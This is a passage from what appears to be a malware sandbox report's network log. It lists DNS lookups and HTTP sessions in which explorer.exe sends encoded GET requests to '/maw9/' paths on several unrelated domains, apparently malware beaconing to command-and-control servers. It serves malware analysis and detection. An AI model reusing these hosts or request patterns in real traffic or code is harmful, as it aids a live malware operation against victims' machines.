                                                                    May 3, 2021 14:54:13.470249891 CEST8049763107.180.57.119192.168.2.6
                                                                    May 3, 2021 14:54:13.470271111 CEST8049763107.180.57.119192.168.2.6
                                                                    May 3, 2021 14:54:13.470285892 CEST8049763107.180.57.119192.168.2.6
                                                                    May 3, 2021 14:54:13.470494986 CEST4976380192.168.2.6107.180.57.119
                                                                    May 3, 2021 14:54:13.470557928 CEST4976380192.168.2.6107.180.57.119
                                                                    May 3, 2021 14:54:13.602511883 CEST8049763107.180.57.119192.168.2.6

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    May 3, 2021 14:52:06.801609993 CEST5177453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:06.850207090 CEST53517748.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:07.866614103 CEST5602353192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:07.917653084 CEST53560238.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:09.031147957 CEST5838453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:09.085213900 CEST53583848.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:10.104856014 CEST6026153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:10.164602041 CEST53602618.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:11.426073074 CEST5606153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:11.474884033 CEST53560618.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:12.578313112 CEST5833653192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:12.627011061 CEST53583368.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:13.094438076 CEST5378153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:13.169132948 CEST53537818.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:13.644759893 CEST5406453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:13.694717884 CEST53540648.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:14.624813080 CEST5281153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:14.676548004 CEST53528118.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:16.291661024 CEST5529953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:16.343203068 CEST53552998.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:17.243180037 CEST6374553192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:17.300841093 CEST53637458.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:18.206481934 CEST5005553192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:18.255245924 CEST53500558.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:19.370393038 CEST6137453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:19.419213057 CEST53613748.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:20.784404039 CEST5033953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:20.833194017 CEST53503398.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:21.732249975 CEST6330753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:21.781076908 CEST53633078.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:22.957520008 CEST4969453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:23.006467104 CEST53496948.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:24.825062990 CEST5498253192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:24.873651981 CEST53549828.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:25.944996119 CEST5001053192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:25.997683048 CEST53500108.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:39.021899939 CEST6371853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:39.070730925 CEST53637188.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:43.575400114 CEST6211653192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:43.628989935 CEST53621168.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:02.776420116 CEST6381653192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:02.835649014 CEST53638168.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:09.870780945 CEST5501453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:10.079027891 CEST53550148.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:10.188205957 CEST6220853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:10.256165028 CEST53622088.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:11.570303917 CEST5757453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:11.623312950 CEST53575748.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:12.723320961 CEST5181853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:12.848351955 CEST53518188.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:13.611901045 CEST5662853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:13.724877119 CEST53566288.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:15.156788111 CEST6077853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:15.214942932 CEST53607788.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:16.745594978 CEST5379953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:16.805594921 CEST5468353192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:16.806613922 CEST53537998.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:16.865751982 CEST53546838.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:17.709784985 CEST5932953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:17.852190971 CEST53593298.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:20.214184046 CEST6402153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:20.266258001 CEST53640218.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:22.851625919 CEST5612953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:22.910708904 CEST53561298.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:23.646487951 CEST5817753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:23.703864098 CEST53581778.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:41.036803007 CEST5070053192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:41.099087954 CEST53507008.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:46.320147038 CEST5406953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:46.609731913 CEST6117853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:46.634038925 CEST53540698.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:46.644306898 CEST5701753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:46.668921947 CEST53611788.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:46.693243027 CEST53570178.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:52.274975061 CEST5632753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:52.444093943 CEST53563278.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:53.144257069 CEST5024353192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:53.218609095 CEST53502438.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:02.750222921 CEST6205553192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:02.814151049 CEST53620558.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:08.005501032 CEST6124953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:08.063040972 CEST53612498.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:13.094579935 CEST6525253192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:13.176599026 CEST53652528.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:18.493829966 CEST6436753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:18.563572884 CEST53643678.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:23.578939915 CEST5506653192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:23.788476944 CEST53550668.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:29.500647068 CEST6021153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:29.579925060 CEST53602118.8.8.8192.168.2.6

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    May 3, 2021 14:53:41.036803007 CEST192.168.2.68.8.8.80x58cdStandard query (0)www.dinkoistmatrimony.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:53:46.320147038 CEST192.168.2.68.8.8.80xcbadStandard query (0)www.premier-moment.infoA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:53:52.274975061 CEST192.168.2.68.8.8.80x53deStandard query (0)www.ecosanhn.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:02.750222921 CEST192.168.2.68.8.8.80xd3c6Standard query (0)www.curvygirlholiday.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:08.005501032 CEST192.168.2.68.8.8.80x4030Standard query (0)www.vipbrandwatch.infoA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:13.094579935 CEST192.168.2.68.8.8.80xd69bStandard query (0)www.networkingmaderas.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:18.493829966 CEST192.168.2.68.8.8.80x230dStandard query (0)www.beachrockisland.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:23.578939915 CEST192.168.2.68.8.8.80x847eStandard query (0)www.itechfreak.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:29.500647068 CEST192.168.2.68.8.8.80x704cStandard query (0)www.jaimericart.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    May 3, 2021 14:53:41.099087954 CEST8.8.8.8192.168.2.60x58cdNo error (0)www.dinkoistmatrimony.comdinkoistmatrimony.comCNAME (Canonical name)IN (0x0001)
                                                                    May 3, 2021 14:53:41.099087954 CEST8.8.8.8192.168.2.60x58cdNo error (0)dinkoistmatrimony.com34.102.136.180A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:53:46.634038925 CEST8.8.8.8192.168.2.60xcbadNo error (0)www.premier-moment.info202.254.234.152A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:53:52.444093943 CEST8.8.8.8192.168.2.60x53deNo error (0)www.ecosanhn.comecosanhn.comCNAME (Canonical name)IN (0x0001)
                                                                    May 3, 2021 14:53:52.444093943 CEST8.8.8.8192.168.2.60x53deNo error (0)ecosanhn.com181.214.142.2A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:02.814151049 CEST8.8.8.8192.168.2.60xd3c6No error (0)www.curvygirlholiday.comcurvygirlholiday.comCNAME (Canonical name)IN (0x0001)
                                                                    May 3, 2021 14:54:02.814151049 CEST8.8.8.8192.168.2.60xd3c6No error (0)curvygirlholiday.com34.102.136.180A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:08.063040972 CEST8.8.8.8192.168.2.60x4030Name error (3)www.vipbrandwatch.infononenoneA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:13.176599026 CEST8.8.8.8192.168.2.60xd69bNo error (0)www.networkingmaderas.comnetworkingmaderas.comCNAME (Canonical name)IN (0x0001)
                                                                    May 3, 2021 14:54:13.176599026 CEST8.8.8.8192.168.2.60xd69bNo error (0)networkingmaderas.com107.180.57.119A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:18.563572884 CEST8.8.8.8192.168.2.60x230dName error (3)www.beachrockisland.comnonenoneA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:23.788476944 CEST8.8.8.8192.168.2.60x847eNo error (0)www.itechfreak.com192.238.144.41A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:29.579925060 CEST8.8.8.8192.168.2.60x704cNo error (0)www.jaimericart.comjaimericart.comCNAME (Canonical name)IN (0x0001)
                                                                    May 3, 2021 14:54:29.579925060 CEST8.8.8.8192.168.2.60x704cNo error (0)jaimericart.com81.88.48.71A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.dinkoistmatrimony.com
                                                                    • www.premier-moment.info
                                                                    • www.ecosanhn.com
                                                                    • www.curvygirlholiday.com
                                                                    • www.networkingmaderas.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.64975434.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    May 3, 2021 14:53:41.165328026 CEST10311OUTGET /maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.dinkoistmatrimony.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:53:41.302735090 CEST10311INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Mon, 03 May 2021 12:53:41 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "6089be8c-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.649757202.254.234.15280C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    May 3, 2021 14:53:46.949692011 CEST11185OUTGET /maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.premier-moment.info
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:53:47.265083075 CEST11191INHTTP/1.1 301 Moved Permanently
                                                                    Server: nginx
                                                                    Date: Mon, 03 May 2021 12:53:47 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 347
                                                                    Connection: close
                                                                    Location: https://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 72 65 6d 69 65 72 2d 6d 6f 6d 65 6e 74 2e 69 6e 66 6f 2f 6d 61 77 39 2f 3f 41 56 46 3d 36 2b 63 39 57 77 41 39 31 76 63 33 71 31 71 50 56 2f 62 78 64 62 34 6a 4c 43 77 66 72 42 6f 36 6d 6b 47 41 6a 58 65 64 6d 4d 4d 65 61 57 71 4e 56 54 4e 4f 4a 33 33 6c 45 57 37 72 4d 54 59 54 30 45 7a 78 57 37 37 64 43 67 3d 3d 26 61 6d 70 3b 36 6c 3d 73 48 62 4c 70 64 77 38 78 30 4e 78 34 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&amp;6l=sHbLpdw8x0Nx4">here</a>.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.649760181.214.142.280C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    May 3, 2021 14:53:52.576576948 CEST11193OUTGET /maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.ecosanhn.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:53:52.709163904 CEST11194INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Date: Mon, 03 May 2021 12:53:52 GMT
                                                                    Server: LiteSpeed
                                                                    Data Raw: 32 38 37 32 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30
                                                                    Data Ascii: 2872<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #0000


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.64976234.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    May 3, 2021 14:54:02.857573986 CEST11237OUTGET /maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.curvygirlholiday.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:54:02.995352030 CEST11238INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Mon, 03 May 2021 12:54:02 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "608f64c6-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.649763107.180.57.11980C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    May 3, 2021 14:54:13.310914993 CEST11240OUTGET /maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.networkingmaderas.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:54:13.470249891 CEST11241INHTTP/1.1 404 Not Found
                                                                    Date: Mon, 03 May 2021 12:54:13 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Accept-Ranges: bytes
                                                                    Vary: Accept-Encoding,User-Agent
                                                                    Content-Length: 1699
                                                                    Content-Type: text/html
